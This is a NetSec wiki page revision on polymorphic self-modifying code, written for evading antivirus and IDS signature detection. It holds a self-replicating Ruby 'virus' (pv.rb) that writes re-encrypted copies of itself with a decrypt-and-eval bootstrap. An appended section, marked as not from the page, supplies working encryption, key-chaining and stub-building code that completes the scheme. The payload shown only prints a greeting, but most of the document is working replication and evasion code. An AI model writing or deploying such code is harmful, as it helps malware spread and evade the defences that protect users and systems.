Difference between revisions of "Polymorphic"

From NetSec

Revision as of 21:25, 9 November 2011

Adj. Referring to self-modifying code: code that changes its own stored form on each copy (typically by re-encrypting its body under a fresh key and emitting a new decryption stub) while keeping the same behaviour when run.


Reasons to write polymorphic code

The main reason to write polymorphic code is to avoid hash-based or signature-based identification: an IDS or anti-virus engine will not match the payload against a known hash or byte signature, because the payload is stored in encrypted form and only a (varying) decryption stub is exposed on disk. Another reason is to propagate it as multiple copies that do not share a signature. Note that this defeats only static, exact-match detection: the decryption stub, the embedded key and the decrypted payload in memory remain observable, so a signature on the stub itself, an emulating scanner or behaviour-based detection can still catch it.


Techniques of polymorphic code writing

  • Define a stackable set of encrypting/decrypting functions, preferably keyed. Call these sets e and d (encryption / decryption), indexed so that d[i] inverts e[i]. Then for any two integers n, m with n > m, applying e[m] first and e[n] last, and undoing the layers in reverse order (outermost layer first), gives back the original:

    d[m](d[m+1](...(d[n](e[n](e[n-1](...(e[m](code))...))))...)) == code

  Unless the cipher commutes, applying the decryption functions in the same order as the encryptions (d[m] first) does not recover the code.

Note: you can write a single function or pair of functions and have them vary with a series of keys (ideally output by a deterministic key generator, so that each generation can derive the next key from its own), as long as your encryption remains reversible.

  • Write your payload code (the code you want concealed). At the end of this code put a bootstrap that decrypts and runs the payload (in PHP/Ruby/Perl/whatnot, eval it; in C, smash the stack with it; in C#, use reflection). At the beginning of your payload code, call your encryption/duplication routine, so that each run produces a fresh, differently encrypted copy before the payload itself executes.

Example in Ruby

pv.rb (polymorphic virus)

#!/usr/bin/env ruby1.9.1
if (!defined?(FILE))
	FILE=File.basename(__FILE__)
end
load "md.rb";   # provides mencrypt, mdecrypt and deterministicKeygen
#require "FileUtils"
def selfCopy(key)
	newkey = deterministicKeygen(key);
	# read our own source; in a copy, FILE is the copy's file, so the
	# existing stub gets wrapped in one more encryption layer
	code = File.read(FILE)
	code = mencrypt(code, key)
	# define new file name
	fn = rand(128).to_s + 'copy.rb';
	File.open(fn, 'w+') do |f|
		f.write('load "md.rb";'+"\n");
		# this is needed because __FILE__ isn't to be found in eval
		f.write("if (!defined?(FILE))\n\tFILE=__FILE__;\nend;\n");
		# String#inspect emits a valid Ruby literal even if the
		# ciphertext contains quotes, backslashes or #{
		f.write('code=' + code.inspect + ";\n")
		f.write('eval(mdecrypt(code, ' + key.to_s+'))');
	end
	# the copy's body still contains "key = 42", so every generation
	# encrypts under 42; newkey is returned but never used by this revision
	return newkey
end

# initial key is 42, D.A. told me
key = 42
# malicious section
# first, replicate
key = selfCopy(key)
# then do evil!
puts "Hello, it's savitri"

md.rb (utility functions)

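This revision of the page does not show the contents of md.rb; pv.rb only calls three functions from it: mencrypt(code, key), mdecrypt(code, key) and deterministicKeygen(key). What follows is an added example, not the original md.rb or any code from the NetSec page: one possible implementation of those three functions (the cipher, an XOR keystream followed by hex encoding, and the key generator, a linear congruential step, are both assumptions), together with a stub builder that follows the stackable-encryption and bootstrap steps of the Techniques section above and actually carries the key chain forward, so that each generation is encrypted under a different key. The helper names keystream, stack, unstack, make_stub, run_stub, PAYLOAD and demo are introduced here and are not from the page. It works on in-memory strings rather than writing files, and omits the load "md.rb" line from the stub because everything is in one file. Because each layer is hex-encoded, the layers do not commute, and the example also shows that undoing them in the wrong order does not recover the payload.

```ruby
#!/usr/bin/env ruby
# Added example: one possible md.rb plus a key-chained stub builder.
# Not the NetSec page's code; the cipher and key generator are assumptions.
require "digest"

# Deterministic key generator (assumed: a linear congruential step).
# Each generation derives its key from the previous generation's key.
def deterministicKeygen(key)
  (key * 1103515245 + 12345) % 2**31
end

# Keystream for the XOR layer: one byte per step of the same generator.
def keystream(key, length)
  state = key
  Array.new(length) do
    state = deterministicKeygen(state)
    (state >> 16) & 0xff
  end
end

# Encrypt: XOR with the keystream, then hex-encode. The hex output is plain
# ASCII (safe inside a Ruby string literal), and because a second layer
# encrypts the hex text of the first, layers must be undone in reverse order.
def mencrypt(plain, key)
  bytes = plain.bytes
  bytes.zip(keystream(key, bytes.length)).map { |b, k| b ^ k }
       .pack("C*").unpack1("H*")
end

def mdecrypt(hex, key)
  bytes = [hex].pack("H*").bytes
  bytes.zip(keystream(key, bytes.length)).map { |b, k| b ^ k }
       .pack("C*").force_encoding(Encoding::UTF_8)
end

# Apply layers e[m] .. e[n] (keys in encryption order) and undo them as
# d[n] .. d[m]: outermost layer first.
def stack(plain, keys)
  keys.reduce(plain) { |acc, k| mencrypt(acc, k) }
end

def unstack(cipher, keys)
  keys.reverse.reduce(cipher) { |acc, k| mdecrypt(acc, k) }
end

# Bootstrap that a copy consists of: the ciphertext as a Ruby literal and a
# decrypt-and-eval line, like pv.rb's stub but with the key actually rotated.
# Returns the stub source and the key the next generation should use.
def make_stub(source, key)
  stub = "code = #{mencrypt(source, key).inspect}\n" \
         "eval(mdecrypt(code, #{key}))\n"
  [stub, deterministicKeygen(key)]
end

# Constructed payload standing in for the page's "malicious section". It sets
# a global instead of printing so that the result can be checked.
PAYLOAD = "$stub_output = \"Hello, it's savitri\"\n"

# Run a stub exactly as pv.rb's bootstrap does: eval the decryptor text.
def run_stub(stub)
  $stub_output = nil
  eval(stub)
  $stub_output
end

def demo
  k1 = deterministicKeygen(42)          # the page starts from key 42
  stub1, k2 = make_stub(PAYLOAD, k1)     # first generation
  stub2, _k3 = make_stub(PAYLOAD, k2)    # second generation, new key
  nested, _ = make_stub(stub1, k2)       # a copy of a copy: stub inside a stub
  ct = stack(PAYLOAD, [k1, k2])
  wrong = begin
    unstack(ct, [k2, k1]) != PAYLOAD     # d[k1] applied before d[k2]
  rescue StandardError
    true
  end
  {
    roundtrip: unstack(ct, [k1, k2]) == PAYLOAD,
    wrong_order_fails: wrong,
    distinct_hashes: Digest::SHA256.hexdigest(stub1) != Digest::SHA256.hexdigest(stub2),
    stub_runs: run_stub(stub1),
    nested_runs: run_stub(nested),
  }
end

demo.each { |name, value| puts "#{name}: #{value}" } if __FILE__ == $0
```

Run it directly to print the checks. The two generations decrypt to the same payload but have different SHA-256 digests, which is the whole point of the technique; the nested case corresponds to pv.rb running from a copy, where the copy's stub is itself wrapped in a further layer and the layers are peeled off outermost first.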